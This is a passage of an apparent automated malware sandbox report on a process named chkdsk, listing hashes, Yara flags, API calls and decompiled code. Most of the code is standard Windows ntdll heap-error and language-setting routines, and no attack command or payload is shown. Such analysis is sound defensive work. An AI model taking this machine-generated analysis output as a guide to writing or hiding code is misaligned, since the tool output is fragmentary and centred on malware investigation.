                                                      • Opcode Fuzzy Hash: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
                                                      • Instruction Fuzzy Hash: 98E092733813043BE73065A99C02FA7B39CDB81B24F55002AFA4DEB2C0D695F81142A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA88B0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(04AA3536,?,04AA3CAF,04AA3CAF,?,04AA3536,?,?,?,?,?,00000000,00000000,?), ref: 04AA88DD
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: 9057e11b7f967e80cdaa973970aeca2e3f24384975669c7e31d7b3bec91ed1b2
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction Fuzzy Hash: C0E046B1200208ABDB14EF99CC44EA777ACEF88654F118558FE085B241C630F910CBF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA8A50 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,04A9CFC2,04A9CFC2,?,00000000,?,?), ref: 04AA8A80
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: a40805b573bdfbe3415e6fcd9bf4d260758d8abc32520f069ef5da2b670a4f48
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 92E01AB12002086BDB10DF49CC84EE737ADAF88650F018554FA0857241CA30F910CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A9D42A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,04A97C83,?), ref: 04A9D45B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 2ff070207339124700ed174a18ed7179627ea2e9f027f876656bf64ecc5f4b3e
                                                      • Instruction ID: edc8adfdc4ee366876c401254bab87e9e777632380e72f6ae1940337f7a31609
                                                      • Opcode Fuzzy Hash: 2ff070207339124700ed174a18ed7179627ea2e9f027f876656bf64ecc5f4b3e
                                                      • Instruction Fuzzy Hash: F8D02E767903043AEB20EBB09C03FAA67C65F51650F490068FA8DE73C3DA90E2008A20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A9D430 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,04A97C83,?), ref: 04A9D45B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                      • Instruction ID: 0d532d2a3f8ac14df093732c55d8774e41a6a7a5e7d7259a8db576332d64eb17
                                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                      • Instruction Fuzzy Hash: E3D05E757503042AEA10AAA49C02F2672C95B45A44F494064FA48972C3DA50F4008161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7acf9721ad2b8da6c5b0fdc6ff5e1ff1c2b04c89e773952d49f6d6df3771c2f5
                                                      • Instruction ID: 3132691443963d7b6150ddcc7d41549c2373426da15d1aa9bbb75cf660ddb2bf
                                                      • Opcode Fuzzy Hash: 7acf9721ad2b8da6c5b0fdc6ff5e1ff1c2b04c89e773952d49f6d6df3771c2f5
                                                      • Instruction Fuzzy Hash: 3DB09BB19414C5C9FB11D7A44608717791177D4745F16C155D1020755A4778D0D1F6B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 04E3B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      • <unknown>, xrefs: 04E3B27E, 04E3B2D1, 04E3B350, 04E3B399, 04E3B417, 04E3B48E
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04E3B39B
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04E3B323
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04E3B3D6
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04E3B47D
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04E3B2DC
                                                      • read from, xrefs: 04E3B4AD, 04E3B4B2
                                                      • The critical section is owned by thread %p., xrefs: 04E3B3B9
                                                      • *** then kb to get the faulting stack, xrefs: 04E3B51C
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04E3B305
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04E3B38F
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04E3B476
                                                      • an invalid address, %p, xrefs: 04E3B4CF
                                                      • The instruction at %p referenced memory at %p., xrefs: 04E3B432
                                                      • *** enter .cxr %p for the context, xrefs: 04E3B50D
                                                      • Go determine why that thread has not released the critical section., xrefs: 04E3B3C5
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 04E3B352
                                                      • *** Inpage error in %ws:%s, xrefs: 04E3B418
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04E3B484
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04E3B314
                                                      • This failed because of error %Ix., xrefs: 04E3B446
                                                      • The instruction at %p tried to %s , xrefs: 04E3B4B6
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04E3B53F
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 04E3B48F
                                                      • a NULL pointer, xrefs: 04E3B4E0
                                                      • write to, xrefs: 04E3B4A6
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04E3B2F3
                                                      • The resource is owned exclusively by thread %p, xrefs: 04E3B374
                                                      • *** enter .exr %p for the exception record, xrefs: 04E3B4F1
                                                      • The resource is owned shared by %d threads, xrefs: 04E3B37E
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: 76c0679a1e0bf06518b97e065bcd9219cf404d13db6df0ecd91b2005722b4399
                                                      • Instruction ID: b2310bcf478bea9d58e2a7d27b310de60eaf645ce081a258b5212e5506e29e3c
                                                      • Opcode Fuzzy Hash: 76c0679a1e0bf06518b97e065bcd9219cf404d13db6df0ecd91b2005722b4399
                                                      • Instruction Fuzzy Hash: CE81F475A80210FFEB236F058C4AD7B3B37AF86B5AF405045F5066B122F2A1B451DBB6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E41C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E04E41C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4d648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D8B150();
				} else {
					E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4e7589c);
				E04D8B150("Heap error detected at %p (heap handle %p)\n",  *0x4e758a0);
				_t27 =  *0x4e75898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04E41E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D8B150();
				} else {
					E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04D8B150("Error code: %d - %s\n",  *0x4e75898);
				_t113 =  *0x4e758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D8B150();
					} else {
						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D8B150("Parameter1: %p\n",  *0x4e758a4);
				}
				_t115 =  *0x4e758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D8B150();
					} else {
						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D8B150("Parameter2: %p\n",  *0x4e758a8);
				}
				_t117 =  *0x4e758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D8B150();
					} else {
						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04D8B150("Parameter3: %p\n",  *0x4e758ac);
				}
				_t119 =  *0x4e758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04D8B150();
					} else {
						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4e758b4);
					E04D8B150("Last known valid blocks: before - %p, after - %p\n",  *0x4e758b0);
				} else {
					_t120 =  *0x4e758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04D8B150();
				} else {
					E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04D8B150("Stack trace available at %p\n", 0x4e758c0);
			}











                                                      0x04e41c10
                                                      0x04e41c16
                                                      0x04e41c1e
                                                      0x04e41c3d
                                                      0x04e41c3e
                                                      0x04e41c20
                                                      0x04e41c35
                                                      0x04e41c3a
                                                      0x04e41c44
                                                      0x04e41c55
                                                      0x04e41c5a
                                                      0x04e41c65
                                                      0x04e41c67
                                                      0x00000000
                                                      0x04e41c6e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04e41c67
                                                      0x04e41cdc
                                                      0x04e41ce5
                                                      0x04e41d04
                                                      0x04e41d05
                                                      0x04e41ce7
                                                      0x04e41cfc
                                                      0x04e41d01
                                                      0x04e41d0b
                                                      0x04e41d17
                                                      0x04e41d1f
                                                      0x04e41d25
                                                      0x04e41d30
                                                      0x04e41d4f
                                                      0x04e41d50
                                                      0x04e41d32
                                                      0x04e41d47
                                                      0x04e41d4c
                                                      0x04e41d61
                                                      0x04e41d67
                                                      0x04e41d68
                                                      0x04e41d6e
                                                      0x04e41d79
                                                      0x04e41d98
                                                      0x04e41d99
                                                      0x04e41d7b
                                                      0x04e41d90
                                                      0x04e41d95
                                                      0x04e41daa
                                                      0x04e41db0
                                                      0x04e41db1
                                                      0x04e41db7
                                                      0x04e41dc2
                                                      0x04e41de1
                                                      0x04e41de2
                                                      0x04e41dc4
                                                      0x04e41dd9
                                                      0x04e41dde
                                                      0x04e41df3
                                                      0x04e41df9
                                                      0x04e41dfa
                                                      0x04e41e00
                                                      0x04e41e0a
                                                      0x04e41e13
                                                      0x04e41e32
                                                      0x04e41e33
                                                      0x04e41e15
                                                      0x04e41e2a
                                                      0x04e41e2f
                                                      0x04e41e39
                                                      0x04e41e4a
                                                      0x04e41e02
                                                      0x04e41e02
                                                      0x04e41e08
                                                      0x00000000
                                                      0x00000000
                                                      0x04e41e08
                                                      0x04e41e5b
                                                      0x04e41e7a
                                                      0x04e41e7b
                                                      0x04e41e5d
                                                      0x04e41e72
                                                      0x04e41e77
                                                      0x04e41e95

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: cd6c803b9e9c6cf6f7cf17e1953b299d391e187dbccfc804bd77caf5a325f617
                                                      • Instruction ID: cc77ed99bf284a484565bea497cc91ef837efbb9bc4de3cef883a682580b43bf
                                                      • Opcode Fuzzy Hash: cd6c803b9e9c6cf6f7cf17e1953b299d391e187dbccfc804bd77caf5a325f617
                                                      • Instruction Fuzzy Hash: C1619336651144DFEA15AB55E88CE38B3E4EB44A35B0984BEF40E6F711E638FC809F19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D93D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E04D93D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04D91B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04D91B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04D91B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04D91B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04D91B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04DA4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04DCF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04DD1370(_t276, 0x4d64e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04DCBB40(0,  &_v68, _t170);
									if(L04D943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04DCBB40(_t257,  &_v68, _t243);
								if(L04D943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04DD1370(_t278, 0x4d64e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04DA4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04DCF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04DD1370(_v16, 0x4d64e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04DCBB40(_t262,  &_v68, _t244);
								if(L04D943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04DD1370(_t282, 0x4d64e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04DCBB40(_t262,  &_v68, _t201);
							if(L04D943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04DA4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04DCF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04DD1370(_t280, 0x4d64e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04DCBB40(_t267,  &_v68, _t245);
							if(L04D943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04DD1370(_t284, 0x4d64e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04DCBB40(_t267,  &_v68, _t224);
						if(L04D943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                      0x04d93d3c
                                                      0x04d93d42
                                                      0x04d93d44
                                                      0x04d93d46
                                                      0x04d93d49
                                                      0x04d93d4c
                                                      0x04d93d4f
                                                      0x04d93d52
                                                      0x04d93d55
                                                      0x04d93d58
                                                      0x04d93d5b
                                                      0x04d93d5f
                                                      0x04d93d61
                                                      0x04d93d66
                                                      0x04de8213
                                                      0x04de8218
                                                      0x04d94085
                                                      0x04d94088
                                                      0x04d9408e
                                                      0x04d94094
                                                      0x04d9409a
                                                      0x04d940a0
                                                      0x04d940a6
                                                      0x04d940a9
                                                      0x04d940af
                                                      0x04d940b6
                                                      0x04d940bd
                                                      0x04d940bd
                                                      0x04d93d83
                                                      0x04de821f
                                                      0x04de8229
                                                      0x04de8238
                                                      0x04de8238
                                                      0x04de823d
                                                      0x04de823d
                                                      0x04d93da0
                                                      0x04d93daf
                                                      0x04d93db5
                                                      0x04d93dba
                                                      0x04d93dba
                                                      0x04d93dd4
                                                      0x04d93e94
                                                      0x04d93eab
                                                      0x04d93f6d
                                                      0x04d93f84
                                                      0x04d9406b
                                                      0x04d9406b
                                                      0x04d9406e
                                                      0x04d9406e
                                                      0x04d94070
                                                      0x04d94074
                                                      0x04de8351
                                                      0x04de8351
                                                      0x04d9407a
                                                      0x04d9407f
                                                      0x04de835d
                                                      0x04de8370
                                                      0x04de8377
                                                      0x04de8379
                                                      0x04de837c
                                                      0x04de837c
                                                      0x04de835d
                                                      0x00000000
                                                      0x04d9407f
                                                      0x04d93f8a
                                                      0x04d93f8d
                                                      0x04d93f90
                                                      0x04d93f95
                                                      0x04de830d
                                                      0x04de830f
                                                      0x04d93f9b
                                                      0x04d93fac
                                                      0x04d93fae
                                                      0x04d93fb1
                                                      0x04d93fb1
                                                      0x04d93fb6
                                                      0x04de8317
                                                      0x04de831a
                                                      0x00000000
                                                      0x04d93fbc
                                                      0x04d93fc1
                                                      0x04d93fc9
                                                      0x04d93fd7
                                                      0x04d93fda
                                                      0x04d93fdd
                                                      0x04d94021
                                                      0x04d94021
                                                      0x04d94029
                                                      0x04d94030
                                                      0x04d94044
                                                      0x04d94046
                                                      0x04d94046
                                                      0x04d94044
                                                      0x04d94049
                                                      0x04de8327
                                                      0x04de8334
                                                      0x04de8339
                                                      0x04de833c
                                                      0x04d9404f
                                                      0x04d9404f
                                                      0x04d9404f
                                                      0x04d94051
                                                      0x04d94056
                                                      0x04d94063
                                                      0x04d94063
                                                      0x04d94068
                                                      0x00000000
                                                      0x04d94068
                                                      0x04d93fdf
                                                      0x04d93fe2
                                                      0x04d93fe4
                                                      0x04d93fe7
                                                      0x04d93fef
                                                      0x04d94003
                                                      0x04d94005
                                                      0x04d94005
                                                      0x04d9400c
                                                      0x04d94013
                                                      0x04d94016
                                                      0x04d94017
                                                      0x04d9401b
                                                      0x04d9401e
